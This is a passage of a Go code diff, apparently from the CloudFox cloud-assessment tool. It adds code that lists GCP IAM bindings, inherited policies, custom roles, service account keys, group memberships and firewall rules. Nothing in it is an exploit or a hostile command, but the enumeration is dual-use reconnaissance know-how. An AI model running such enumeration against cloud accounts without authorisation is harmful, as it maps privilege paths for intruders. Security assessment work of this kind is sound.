`json:"role"` // OWNER, MANAGER, MEMBER + Status string `json:"status"` // ACTIVE, SUSPENDED, etc. + IsExternal bool `json:"isExternal"` // External to the organization +} + +// GroupInfo represents a Google Group (for tracking group memberships) +type GroupInfo struct { + Email string `json:"email"` + DisplayName string `json:"displayName"` + Description string `json:"description"` + Roles []string `json:"roles"` // Roles assigned to this group + ProjectID string `json:"projectId"` + Members []GroupMember `json:"members"` // Direct members of this group + NestedGroups []string `json:"nestedGroups"` // Groups that are members of this group + MemberCount int `json:"memberCount"` // Total direct members + HasNestedGroups bool `json:"hasNestedGroups"` + MembershipEnumerated bool `json:"membershipEnumerated"` // Whether we successfully enumerated members +} + +// CombinedIAMData holds all IAM-related data for a project +type CombinedIAMData struct { + Principals []PrincipalWithRoles `json:"principals"` + ServiceAccounts []ServiceAccountInfo `json:"serviceAccounts"` + CustomRoles []CustomRole `json:"customRoles"` + Groups []GroupInfo `json:"groups"` + InheritedRoles []PolicyBinding `json:"inheritedRoles"` } var logger internal.Logger -func projectAncestry(projectID string) ([]AncestryResource, error) { +func (s *IAMService) projectAncestry(projectID string) ([]AncestryResource, error) { ctx := context.Background() - projectsClient, err := resourcemanager.NewProjectsClient(ctx) + var projectsClient *resourcemanager.ProjectsClient + var foldersClient *resourcemanager.FoldersClient + var err error + + if s.session != nil { + projectsClient, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + projectsClient, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { return nil, fmt.Errorf("failed to create projects client: %v", err) } defer projectsClient.Close() - foldersClient, err := resourcemanager.NewFoldersClient(ctx) + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } if err != nil { return nil, fmt.Errorf("failed to create folders client: %v", err) } @@ -99,7 +231,14 @@ func projectAncestry(projectID string) ([]AncestryResource, error) { // Policies fetches IAM policy for a given resource and all policies in resource ancestry func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyBinding, error) { ctx := context.Background() - client, err := resourcemanager.NewProjectsClient(ctx) + var client *resourcemanager.ProjectsClient + var err error + + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } if err != nil { return nil, fmt.Errorf("resourcemanager.NewProjectsClient: %v", err) } @@ -145,17 +284,50 @@ func (s *IAMService) Policies(resourceID string, resourceType string) ([]PolicyB } func determinePrincipalType(member string) string { - if strings.HasPrefix(member, "user:") { + switch { + case strings.HasPrefix(member, "user:"): return "User" - } else if strings.HasPrefix(member, "serviceAccount:") { + case strings.HasPrefix(member, "serviceAccount:"): return "ServiceAccount" - } else if strings.HasPrefix(member, "group:") { + case strings.HasPrefix(member, "group:"): return "Group" - } else { + case strings.HasPrefix(member, "domain:"): + return "Domain" + case member == "allUsers": + return "PUBLIC" + case member == "allAuthenticatedUsers": + return "ALL_AUTHENTICATED" + case strings.HasPrefix(member, "deleted:"): + return "Deleted" + case strings.HasPrefix(member, "projectOwner:"): + return "ProjectOwner" + case strings.HasPrefix(member, "projectEditor:"): + return "ProjectEditor" + case strings.HasPrefix(member, "projectViewer:"): + return "ProjectViewer" + case strings.HasPrefix(member, "principal:"): + return "WorkloadIdentity" + case strings.HasPrefix(member, "principalSet:"): + return "WorkloadIdentityPool" + default: return "Unknown" } } +// extractEmail extracts the clean email/identifier from a member string +func extractEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} + +// isCustomRole checks if a role is a custom role +func isCustomRole(role string) bool { + return strings.HasPrefix(role, "projects/") || strings.HasPrefix(role, "organizations/") +} + func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) ([]PrincipalWithRoles, error) { policyBindings, err := s.Policies(resourceID, resourceType) if err != nil { @@ -165,16 +337,429 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) principalMap := make(map[string]*PrincipalWithRoles) for _, pb := range policyBindings { for _, member := range pb.Members { - principalType := determinePrincipalType(member) // Implement this function based on member prefix + principalType := determinePrincipalType(member) if principal, ok := principalMap[member]; ok { principal.PolicyBindings = append(principal.PolicyBindings, pb) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } principalMap[member] = &PrincipalWithRoles{ Name: member, Type: principalType, + Email: extractEmail(member), PolicyBindings: []PolicyBinding{pb}, ResourceID: resourceID, ResourceType: resourceType, + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, + } + } + } + } + + var principals []PrincipalWithRoles + for _, principal := range principalMap { + principals = append(principals, *principal) + } + + return principals, nil +} + +// contains checks if a string slice contains a specific string +func contains(slice []string, item string) bool { + for _, s := range slice { + if s == item { + return true + } + } + return false +} + +// ServiceAccounts retrieves all service accounts in a project with detailed info +func (s *IAMService) ServiceAccounts(projectID string) ([]ServiceAccountInfo, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var serviceAccounts []ServiceAccountInfo + + // List all service accounts in the project + req := iamService.Projects.ServiceAccounts.List("projects/" + projectID) + err = req.Pages(ctx, func(page *iam.ListServiceAccountsResponse) error { + for _, sa := range page.Accounts { + saInfo := ServiceAccountInfo{ + Email: sa.Email, + Name: sa.Name, + ProjectID: projectID, + UniqueID: sa.UniqueId, + DisplayName: sa.DisplayName, + Description: sa.Description, + Disabled: sa.Disabled, + OAuth2ClientID: sa.Oauth2ClientId, + } + + // Get keys for this service account + keys, err := s.getServiceAccountKeys(ctx, iamService, sa.Name) + if err != nil { + // Log but don't fail - we might not have permission + logger.InfoM(fmt.Sprintf("Could not list keys for %s: %v", sa.Email, err), globals.GCP_IAM_MODULE_NAME) + } else { + saInfo.Keys = keys + // Count user-managed keys only + userManagedCount := 0 + for _, key := range keys { + if key.KeyType == "USER_MANAGED" { + userManagedCount++ + } + } + saInfo.KeyCount = userManagedCount + saInfo.HasKeys = userManagedCount > 0 + } + + serviceAccounts = append(serviceAccounts, saInfo) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list service accounts: %v", err) + } + + return serviceAccounts, nil +} + +// getServiceAccountKeys retrieves keys for a service account +func (s *IAMService) getServiceAccountKeys(ctx context.Context, iamService *iam.Service, saName string) ([]ServiceAccountKeyInfo, error) { + var keys []ServiceAccountKeyInfo + + resp, err := iamService.Projects.ServiceAccounts.Keys.List(saName).Context(ctx).Do() + if err != nil { + return nil, err + } + + for _, key := range resp.Keys { + keyInfo := ServiceAccountKeyInfo{ + Name: key.Name, + KeyAlgorithm: key.KeyAlgorithm, + KeyOrigin: key.KeyOrigin, + KeyType: key.KeyType, + Disabled: key.Disabled, + } + + // Parse timestamps + if key.ValidAfterTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidAfterTime); err == nil { + keyInfo.ValidAfter = t + } + } + if key.ValidBeforeTime != "" { + if t, err := time.Parse(time.RFC3339, key.ValidBeforeTime); err == nil { + keyInfo.ValidBefore = t + } + } + + keys = append(keys, keyInfo) + } + + return keys, nil +} + +// CustomRoles retrieves all custom roles in a project +func (s *IAMService) CustomRoles(projectID string) ([]CustomRole, error) { + ctx := context.Background() + var iamService *iam.Service + var err error + + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var customRoles []CustomRole + + // List project-level custom roles + req := iamService.Projects.Roles.List("projects/" + projectID) + req.ShowDeleted(true) // Include deleted roles for security awareness + err = req.Pages(ctx, func(page *iam.ListRolesResponse) error { + for _, role := range page.Roles { + customRole := CustomRole{ + Name: role.Name, + Title: role.Title, + Description: role.Description, + IncludedPermissions: role.IncludedPermissions, + Stage: role.Stage, + Deleted: role.Deleted, + Etag: role.Etag, + ProjectID: projectID, + IsProjectLevel: true, + PermissionCount: len(role.IncludedPermissions), + } + customRoles = append(customRoles, customRole) + } + return nil + }) + if err != nil { + // Don't fail completely - we might just not have access to list roles + logger.InfoM(fmt.Sprintf("Could not list custom roles for project %s: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) + } + + return customRoles, nil +} + +// PoliciesWithInheritance fetches IAM policies including inherited ones from folders and organization +func (s *IAMService) PoliciesWithInheritance(projectID string) ([]PolicyBinding, error) { + ctx := context.Background() + + // Get project's ancestry + ancestry, err := s.projectAncestry(projectID) + if err != nil { + // If we can't get ancestry, just return project-level policies + logger.InfoM(fmt.Sprintf("Could not get ancestry for project %s, returning project-level policies only: %v", projectID, err), globals.GCP_IAM_MODULE_NAME) + return s.Policies(projectID, "project") + } + + var allBindings []PolicyBinding + + // Get policies for each resource in the ancestry (org -> folders -> project) + for _, resource := range ancestry { + bindings, err := s.getPoliciesForResource(ctx, resource.Id, resource.Type) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get policies for %s/%s: %v", resource.Type, resource.Id, err), globals.GCP_IAM_MODULE_NAME) + continue + } + + // Mark inherited bindings + for i := range bindings { + if resource.Type != "project" || resource.Id != projectID { + bindings[i].IsInherited = true + bindings[i].InheritedFrom = fmt.Sprintf("%s/%s", resource.Type, resource.Id) + } + } + + allBindings = append(allBindings, bindings...) + } + + return allBindings, nil +} + +// getPoliciesForResource fetches policies for a specific resource using the appropriate client +func (s *IAMService) getPoliciesForResource(ctx context.Context, resourceID string, resourceType string) ([]PolicyBinding, error) { + var resourceName string + + switch resourceType { + case "project": + var client *resourcemanager.ProjectsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewProjectsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewProjectsClient(ctx) + } + if err != nil { + return nil, err + } + defer client.Close() + + resourceName = "projects/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, err + } + return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + + case "folder": + var client *resourcemanager.FoldersClient + var err error + if s.session != nil { + client, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, err + } + defer client.Close() + + resourceName = "folders/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, err + } + return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + + case "organization": + var client *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + client, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + client, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, err + } + defer client.Close() + + resourceName = "organizations/" + resourceID + policy, err := client.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{Resource: resourceName}) + if err != nil { + return nil, err + } + return convertPolicyToBindings(policy, resourceID, resourceType, resourceName), nil + + default: + return nil, fmt.Errorf("unsupported resource type: %s", resourceType) + } +} + +// convertPolicyToBindings converts an IAM policy to PolicyBinding slice +func convertPolicyToBindings(policy *iampb.Policy, resourceID, resourceType, resourceName string) []PolicyBinding { + var bindings []PolicyBinding + for _, binding := range policy.Bindings { + pb := PolicyBinding{ + Role: binding.Role, + Members: binding.Members, + ResourceID: resourceID, + ResourceType: resourceType, + PolicyName: resourceName + "_policyBindings", + } + + // Parse condition if present + if binding.Condition != nil { + pb.Condition = binding.Condition.String() + pb.HasCondition = true + pb.ConditionInfo = &IAMCondition{ + Title: binding.Condition.Title, + Description: binding.Condition.Description, + Expression: binding.Condition.Expression, + } + } + + bindings = append(bindings, pb) + } + return bindings +} + +// CombinedIAM retrieves all IAM-related data for a project +func (s *IAMService) CombinedIAM(projectID string) (CombinedIAMData, error) { + var data CombinedIAMData + + // Get principals with roles (includes inheritance tracking) + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return data, fmt.Errorf("failed to get principals: %v", err) + } + data.Principals = principals + + // Get service accounts with details + serviceAccounts, err := s.ServiceAccounts(projectID) + if err != nil { + // Don't fail completely + logger.InfoM(fmt.Sprintf("Could not get service accounts: %v", err), globals.GCP_IAM_MODULE_NAME) + } else { + data.ServiceAccounts = serviceAccounts + } + + // Get custom roles + customRoles, err := s.CustomRoles(projectID) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get custom roles: %v", err), globals.GCP_IAM_MODULE_NAME) + } else { + data.CustomRoles = customRoles + } + + // Extract groups from principals + var groups []GroupInfo + groupMap := make(map[string]*GroupInfo) + for _, p := range principals { + if p.Type == "Group" { + if _, exists := groupMap[p.Email]; !exists { + groupMap[p.Email] = &GroupInfo{ + Email: p.Email, + ProjectID: projectID, + Roles: []string{}, + } + } + for _, binding := range p.PolicyBindings { + groupMap[p.Email].Roles = append(groupMap[p.Email].Roles, binding.Role) + } + } + } + for _, g := range groupMap { + groups = append(groups, *g) + } + data.Groups = groups + + return data, nil +} + +// PrincipalsWithRolesEnhanced gets principals with roles including inheritance info +func (s *IAMService) PrincipalsWithRolesEnhanced(projectID string) ([]PrincipalWithRoles, error) { + policyBindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + principalMap := make(map[string]*PrincipalWithRoles) + for _, pb := range policyBindings { + for _, member := range pb.Members { + principalType := determinePrincipalType(member) + // Create a binding copy for this principal + principalBinding := PolicyBinding{ + Role: pb.Role, + Members: []string{member}, + ResourceID: pb.ResourceID, + ResourceType: pb.ResourceType, + Condition: pb.Condition, + PolicyName: pb.PolicyName, + IsInherited: pb.IsInherited, + InheritedFrom: pb.InheritedFrom, + } + + if principal, ok := principalMap[member]; ok { + principal.PolicyBindings = append(principal.PolicyBindings, principalBinding) + // Track custom roles + if isCustomRole(pb.Role) && !contains(principal.CustomRoles, pb.Role) { + principal.CustomRoles = append(principal.CustomRoles, pb.Role) + principal.HasCustomRoles = true + } + } else { + customRoles := []string{} + hasCustomRoles := false + if isCustomRole(pb.Role) { + customRoles = append(customRoles, pb.Role) + hasCustomRoles = true + } + principalMap[member] = &PrincipalWithRoles{ + Name: member, + Type: principalType, + Email: extractEmail(member), + PolicyBindings: []PolicyBinding{principalBinding}, + ResourceID: projectID, + ResourceType: "project", + HasCustomRoles: hasCustomRoles, + CustomRoles: customRoles, } } } @@ -187,3 +772,446 @@ func (s *IAMService) PrincipalsWithRoles(resourceID string, resourceType string) return principals, nil } + +// GetMemberType returns the member type for display purposes +func GetMemberType(member string) string { + return determinePrincipalType(member) +} + +// PermissionEntry represents a single permission with its source information +type PermissionEntry struct { + Permission string `json:"permission"` + Role string `json:"role"` + RoleType string `json:"roleType"` // "predefined", "custom", "basic" + ResourceID string `json:"resourceId"` + ResourceType string `json:"resourceType"` + IsInherited bool `json:"isInherited"` + InheritedFrom string `json:"inheritedFrom"` + HasCondition bool `json:"hasCondition"` + Condition string `json:"condition"` +} + +// EntityPermissions represents all permissions for an entity +type EntityPermissions struct { + Entity string `json:"entity"` + EntityType string `json:"entityType"` + Email string `json:"email"` + ProjectID string `json:"projectId"` + Permissions []PermissionEntry `json:"permissions"` + Roles []string `json:"roles"` + TotalPerms int `json:"totalPerms"` + UniquePerms int `json:"uniquePerms"` +} + +// RolePermissions caches role to permissions mapping +var rolePermissionsCache = make(map[string][]string) + +// GetRolePermissions retrieves the permissions for a given role +func (s *IAMService) GetRolePermissions(ctx context.Context, roleName string) ([]string, error) { + // Check cache first + if perms, ok := rolePermissionsCache[roleName]; ok { + return perms, nil + } + + var iamService *iam.Service + var err error + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create IAM service: %v", err) + } + + var permissions []string + + // Handle different role types + if strings.HasPrefix(roleName, "roles/") { + // Predefined role + role, err := iamService.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get role %s: %v", roleName, err) + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "projects/") { + // Project-level custom role + role, err := iamService.Projects.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get custom role %s: %v", roleName, err) + } + permissions = role.IncludedPermissions + } else if strings.HasPrefix(roleName, "organizations/") { + // Organization-level custom role + role, err := iamService.Organizations.Roles.Get(roleName).Context(ctx).Do() + if err != nil { + return nil, fmt.Errorf("failed to get org custom role %s: %v", roleName, err) + } + permissions = role.IncludedPermissions + } + + // Cache the result + rolePermissionsCache[roleName] = permissions + return permissions, nil +} + +// GetRoleType determines the type of role +func GetRoleType(roleName string) string { + switch { + case strings.HasPrefix(roleName, "roles/owner") || strings.HasPrefix(roleName, "roles/editor") || strings.HasPrefix(roleName, "roles/viewer"): + return "basic" + case strings.HasPrefix(roleName, "projects/") || strings.HasPrefix(roleName, "organizations/"): + return "custom" + default: + return "predefined" + } +} + +// GetEntityPermissions retrieves all permissions for a specific entity +func (s *IAMService) GetEntityPermissions(ctx context.Context, projectID string, entity string) (*EntityPermissions, error) { + // Get all bindings with inheritance + bindings, err := s.PoliciesWithInheritance(projectID) + if err != nil { + return nil, err + } + + entityPerms := &EntityPermissions{ + Entity: entity, + EntityType: determinePrincipalType(entity), + Email: extractEmail(entity), + ProjectID: projectID, + Permissions: []PermissionEntry{}, + Roles: []string{}, + } + + // Track unique permissions + uniquePerms := make(map[string]bool) + rolesSet := make(map[string]bool) + + // Process each binding + for _, binding := range bindings { + // Check if this entity is in the binding + found := false + for _, member := range binding.Members { + if member == entity { + found = true + break + } + } + if !found { + continue + } + + // Track the role + if !rolesSet[binding.Role] { + rolesSet[binding.Role] = true + entityPerms.Roles = append(entityPerms.Roles, binding.Role) + } + + // Get permissions for this role + permissions, err := s.GetRolePermissions(ctx, binding.Role) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get permissions for role %s: %v", binding.Role, err), globals.GCP_IAM_MODULE_NAME) + continue + } + + // Create permission entries + for _, perm := range permissions { + permEntry := PermissionEntry{ + Permission: perm, + Role: binding.Role, + RoleType: GetRoleType(binding.Role), + ResourceID: binding.ResourceID, + ResourceType: binding.ResourceType, + IsInherited: binding.IsInherited, + InheritedFrom: binding.InheritedFrom, + HasCondition: binding.HasCondition, + } + if binding.ConditionInfo != nil { + permEntry.Condition = binding.ConditionInfo.Title + } + + entityPerms.Permissions = append(entityPerms.Permissions, permEntry) + + if !uniquePerms[perm] { + uniquePerms[perm] = true + } + } + } + + entityPerms.TotalPerms = len(entityPerms.Permissions) + entityPerms.UniquePerms = len(uniquePerms) + + return entityPerms, nil +} + +// GetAllEntityPermissions retrieves permissions for all entities in a project +func (s *IAMService) GetAllEntityPermissions(projectID string) ([]EntityPermissions, error) { + ctx := context.Background() + + // Get all principals + principals, err := s.PrincipalsWithRolesEnhanced(projectID) + if err != nil { + return nil, err + } + + var allPerms []EntityPermissions + + for _, principal := range principals { + entityPerms, err := s.GetEntityPermissions(ctx, projectID, principal.Name) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not get permissions for %s: %v", principal.Name, err), globals.GCP_IAM_MODULE_NAME) + continue + } + allPerms = append(allPerms, *entityPerms) + } + + return allPerms, nil +} + +// GetGroupMembership retrieves members of a Google Group using Cloud Identity API +// Requires cloudidentity.groups.readonly or cloudidentity.groups scope +func (s *IAMService) GetGroupMembership(ctx context.Context, groupEmail string) (*GroupInfo, error) { + var ciService *cloudidentity.Service + var err error + if s.session != nil { + ciService, err = cloudidentity.NewService(ctx, s.session.GetClientOption()) + } else { + ciService, err = cloudidentity.NewService(ctx) + } + if err != nil { + return nil, fmt.Errorf("failed to create Cloud Identity service: %v", err) + } + + groupInfo := &GroupInfo{ + Email: groupEmail, + Members: []GroupMember{}, + } + + // First, look up the group to get its resource name + // Cloud Identity uses groups/{group_id} format + lookupReq := ciService.Groups.Lookup() + lookupReq.GroupKeyId(groupEmail) + + lookupResp, err := lookupReq.Do() + if err != nil { + return nil, fmt.Errorf("failed to lookup group %s: %v", groupEmail, err) + } + + groupName := lookupResp.Name + + // Get group details + group, err := ciService.Groups.Get(groupName).Do() + if err != nil { + return nil, fmt.Errorf("failed to get group details for %s: %v", groupEmail, err) + } + + groupInfo.DisplayName = group.DisplayName + groupInfo.Description = group.Description + + // List memberships + membershipsReq := ciService.Groups.Memberships.List(groupName) + err = membershipsReq.Pages(ctx, func(page *cloudidentity.ListMembershipsResponse) error { + for _, membership := range page.Memberships { + member := GroupMember{ + Role: membership.Roles[0].Name, // OWNER, MANAGER, MEMBER + } + + // Get member details from preferredMemberKey + if membership.PreferredMemberKey != nil { + member.Email = membership.PreferredMemberKey.Id + } + + // Determine member type + if membership.Type == "GROUP" { + member.Type = "GROUP" + groupInfo.NestedGroups = append(groupInfo.NestedGroups, member.Email) + groupInfo.HasNestedGroups = true + } else if strings.HasSuffix(member.Email, ".iam.gserviceaccount.com") { + member.Type = "SERVICE_ACCOUNT" + } else { + member.Type = "USER" + } + + groupInfo.Members = append(groupInfo.Members, member) + } + return nil + }) + if err != nil { + return nil, fmt.Errorf("failed to list memberships for group %s: %v", groupEmail, err) + } + + groupInfo.MemberCount = len(groupInfo.Members) + groupInfo.MembershipEnumerated = true + + return groupInfo, nil +} + +// GetGroupMemberships retrieves members for all groups found in IAM bindings +func (s *IAMService) GetGroupMemberships(ctx context.Context, groups []GroupInfo) []GroupInfo { + var enrichedGroups []GroupInfo + + for _, group := range groups { + enrichedGroup, err := s.GetGroupMembership(ctx, group.Email) + if err != nil { + // Log but don't fail - Cloud Identity API access is often restricted + logger.InfoM(fmt.Sprintf("Could not enumerate membership for group %s: %v", group.Email, err), globals.GCP_IAM_MODULE_NAME) + // Keep the original group info without membership + group.MembershipEnumerated = false + enrichedGroups = append(enrichedGroups, group) + continue + } + // Preserve the roles from the original group + enrichedGroup.Roles = group.Roles + enrichedGroup.ProjectID = group.ProjectID + enrichedGroups = append(enrichedGroups, *enrichedGroup) + } + + return enrichedGroups +} + +// ExpandGroupPermissions expands permissions to include inherited permissions from group membership +// This creates permission entries for group members based on the group's permissions +func (s *IAMService) ExpandGroupPermissions(ctx context.Context, projectID string, entityPerms []EntityPermissions) ([]EntityPermissions, error) { + // Find all groups in the entity permissions + groupPermsMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + if entityPerms[i].EntityType == "Group" { + groupPermsMap[entityPerms[i].Entity] = &entityPerms[i] + } + } + + if len(groupPermsMap) == 0 { + return entityPerms, nil + } + + // Try to enumerate group memberships + var groupInfos []GroupInfo + for groupEmail := range groupPermsMap { + groupInfos = append(groupInfos, GroupInfo{Email: groupEmail, ProjectID: projectID}) + } + + enrichedGroups := s.GetGroupMemberships(ctx, groupInfos) + + // Create a map of member to their inherited permissions from groups + memberInheritedPerms := make(map[string][]PermissionEntry) + + for _, group := range enrichedGroups { + if !group.MembershipEnumerated { + continue + } + + groupPerms := groupPermsMap["group:"+group.Email] + if groupPerms == nil { + continue + } + + // For each member of the group, add the group's permissions as inherited + for _, member := range group.Members { + memberKey := "" + switch member.Type { + case "USER": + memberKey = "user:" + member.Email + case "SERVICE_ACCOUNT": + memberKey = "serviceAccount:" + member.Email + case "GROUP": + memberKey = "group:" + member.Email + } + + if memberKey == "" { + continue + } + + // Create inherited permission entries + for _, perm := range groupPerms.Permissions { + inheritedPerm := PermissionEntry{ + Permission: perm.Permission, + Role: perm.Role, + RoleType: perm.RoleType, + ResourceID: perm.ResourceID, + ResourceType: perm.ResourceType, + IsInherited: true, + InheritedFrom: fmt.Sprintf("group:%s", group.Email), + HasCondition: perm.HasCondition, + Condition: perm.Condition, + } + memberInheritedPerms[memberKey] = append(memberInheritedPerms[memberKey], inheritedPerm) + } + } + } + + // Add inherited permissions to existing entities or create new ones + entityMap := make(map[string]*EntityPermissions) + for i := range entityPerms { + entityMap[entityPerms[i].Entity] = &entityPerms[i] + } + + for memberKey, inheritedPerms := range memberInheritedPerms { + if existing, ok := entityMap[memberKey]; ok { + // Add inherited permissions to existing entity + existing.Permissions = append(existing.Permissions, inheritedPerms...) + existing.TotalPerms = len(existing.Permissions) + // Recalculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range existing.Permissions { + uniquePerms[p.Permission] = true + } + existing.UniquePerms = len(uniquePerms) + } else { + // Create new entity entry for this group member + newEntity := EntityPermissions{ + Entity: memberKey, + EntityType: determinePrincipalType(memberKey), + Email: extractEmail(memberKey), + ProjectID: projectID, + Permissions: inheritedPerms, + Roles: []string{}, // Roles are inherited via group + TotalPerms: len(inheritedPerms), + } + // Calculate unique perms + uniquePerms := make(map[string]bool) + for _, p := range inheritedPerms { + uniquePerms[p.Permission] = true + } + newEntity.UniquePerms = len(uniquePerms) + entityPerms = append(entityPerms, newEntity) + } + } + + return entityPerms, nil +} + +// GetAllEntityPermissionsWithGroupExpansion retrieves permissions with group membership expansion +func (s *IAMService) GetAllEntityPermissionsWithGroupExpansion(projectID string) ([]EntityPermissions, []GroupInfo, error) { + ctx := context.Background() + + // Get base permissions + entityPerms, err := s.GetAllEntityPermissions(projectID) + if err != nil { + return nil, nil, err + } + + // Find groups + var groups []GroupInfo + for _, ep := range entityPerms { + if ep.EntityType == "Group" { + groups = append(groups, GroupInfo{ + Email: ep.Email, + ProjectID: projectID, + Roles: ep.Roles, + }) + } + } + + // Try to enumerate group memberships + enrichedGroups := s.GetGroupMemberships(ctx, groups) + + // Expand permissions based on group membership + expandedPerms, err := s.ExpandGroupPermissions(ctx, projectID, entityPerms) + if err != nil { + logger.InfoM(fmt.Sprintf("Could not expand group permissions: %v", err), globals.GCP_IAM_MODULE_NAME) + return entityPerms, enrichedGroups, nil + } + + return expandedPerms, enrichedGroups, nil +} diff --git a/gcp/services/networkService/networkService.go b/gcp/services/networkService/networkService.go index 382db204..30aa9a00 100644 --- a/gcp/services/networkService/networkService.go +++ b/gcp/services/networkService/networkService.go @@ -7,6 +7,7 @@ import ( "strings" ComputeEngineService "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "google.golang.org/api/compute/v1" ) @@ -57,17 +58,30 @@ type Endpoint struct { } type NetwworkService struct { - // DataStoreService datastoreservice.DataStoreService + session *gcpinternal.SafeSession } +// New creates a new NetworkService (legacy - uses ADC directly) func New() *NetwworkService { return &NetwworkService{} } +// NewWithSession creates a NetworkService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) *NetwworkService { + return &NetwworkService{session: session} +} + // Returns firewall rules for a project. func (ns *NetwworkService) FirewallRules(projectID string) ([]*compute.Firewall, error) { ctx := context.Background() - computeService, err := compute.NewService(ctx) + var computeService *compute.Service + var err error + + if ns.session != nil { + computeService, err = compute.NewService(ctx, ns.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } if err != nil { return nil, err } diff --git a/gcp/services/secretsService/secretsService.go b/gcp/services/secretsService/secretsService.go index 75b9f510..14af72d3 100644 --- a/gcp/services/secretsService/secretsService.go +++ b/gcp/services/secretsService/secretsService.go @@ -2,11 +2,18 @@ package secretservice import ( "context" + "encoding/json" "fmt" + "io" + "net/http" + "strings" + "time" secretmanager "cloud.google.com/go/secretmanager/apiv1" secretmanagerpb "cloud.google.com/go/secretmanager/apiv1/secretmanagerpb" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/googleapis/gax-go/v2" + "golang.org/x/oauth2/google" "google.golang.org/api/iterator" ) @@ -18,6 +25,8 @@ type Iterator interface { type SecretsManagerClientWrapper struct { Closer func() error SecretLister func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator + IAMGetter func(ctx context.Context, secretName string) (*secretmanagerpb.Secret, error) + rawClient *secretmanager.Client } func (w *SecretsManagerClientWrapper) Close() error { @@ -26,14 +35,14 @@ func (w *SecretsManagerClientWrapper) Close() error { func (w *SecretsManagerClientWrapper) ListSecrets(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return w.SecretLister(ctx, req, opts...) - } type SecretsService struct { - Client *SecretsManagerClientWrapper + Client *SecretsManagerClientWrapper + session *gcpinternal.SafeSession } -// New function to facilitate using the ss client +// New creates a SecretsService with the provided client func New(client *secretmanager.Client) SecretsService { ss := SecretsService{ Client: &SecretsManagerClientWrapper{ @@ -41,17 +50,88 @@ func New(client *secretmanager.Client) SecretsService { SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { return client.ListSecrets(ctx, req, opts...) }, + rawClient: client, }, } return ss } +// NewWithSession creates a SecretsService with a SafeSession for managed authentication +func NewWithSession(session *gcpinternal.SafeSession) (SecretsService, error) { + ctx := context.Background() + var client *secretmanager.Client + var err error + + if session != nil { + client, err = secretmanager.NewClient(ctx, session.GetClientOption()) + } else { + client, err = secretmanager.NewClient(ctx) + } + if err != nil { + return SecretsService{}, fmt.Errorf("failed to create secret manager client: %v", err) + } + + ss := SecretsService{ + Client: &SecretsManagerClientWrapper{ + Closer: client.Close, + SecretLister: func(ctx context.Context, req *secretmanagerpb.ListSecretsRequest, opts ...gax.CallOption) Iterator { + return client.ListSecrets(ctx, req, opts...) + }, + rawClient: client, + }, + session: session, + } + return ss, nil +} + +// IAMBinding represents a single IAM 